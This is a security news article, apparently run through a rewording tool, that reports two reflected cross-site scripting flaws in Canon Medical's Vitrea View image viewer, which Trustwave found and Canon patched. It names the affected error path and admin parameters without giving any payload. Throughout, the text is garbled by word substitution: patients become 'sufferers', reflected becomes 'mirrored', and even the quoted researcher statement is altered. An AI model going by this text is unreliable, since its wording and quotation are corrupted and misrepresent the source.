Researchers have lately reported a number of vulnerabilities within the software program for the Canon Medical Vitrea View instrument. Exploiting the issues might expose sufferers’ info and different associated companies to the attacker. Canon Medical patched the problems following the bug studies, compelling customers to improve their programs to obtain the fixes.
Canon Medical Vitrea View Vulnerabilities
Reportedly, researchers from Trustwave Spiderlabs found two completely different vulnerabilities in Canon Medical Vitrea View software program.
As elaborated of their report, the issues existed within the third-party software program powering the Canon Medical instrument that facilitates viewing medical photographs. Exploiting the issues might enable an adversary to realize entry to sufferers’ information and different Vitrea View companies.
Particularly, the primary concern was a mirrored cross-site scripting (XSS) vulnerability within the error message. The flaw appeared because the error web page at
/vitrea-view/error/ mirrored all enter after the
/error/ subdirectory to the consumer. Whereas it had some minor restrictions, a geeky consumer might bypass them through backticks (`) and base64 encoding, and import distant codes.
The following vulnerability was additionally recognized as a mirrored XSS, nonetheless, it existed within the Vitrea View Administrative panel. Describing this vulnerability, the researchers said,
“The seek for ‘groupID’, ‘offset’, and ‘restrict’ within the ‘Group and Customers’ web page of the administration panel all replicate their enter again to the consumer when textual content is entered as an alternative of the anticipated numerical inputs. Just like the earlier discovering, the mirrored enter is barely restricted, because it doesn’t enable areas.
Exploiting the vulnerability required an attacker to trick the goal consumer into giving admin panel entry through social engineering. An adversary might simply do this by sending a maliciously crafted hyperlink to the sufferer consumer. Then, clicking the hyperlink would give admin management to the attacker.
Upon exploiting the issues, an attacker might view and entry sufferers’ particulars, together with the photographs and scans. Additionally, the adversary might entry credentials for delicate companies and even modify the data based on the gained privileges.
Canon Medical Patched The Flaws
Following this discovery, Trustwave researchers responsibly disclosed the vulnerabilities to Canon Medical officers. In response, the distributors patched rolled out the patched software program model 7.7.6 for his or her units.
Therefore now, the researchers urge the customers to improve their programs to the newest software program model to obtain the patches.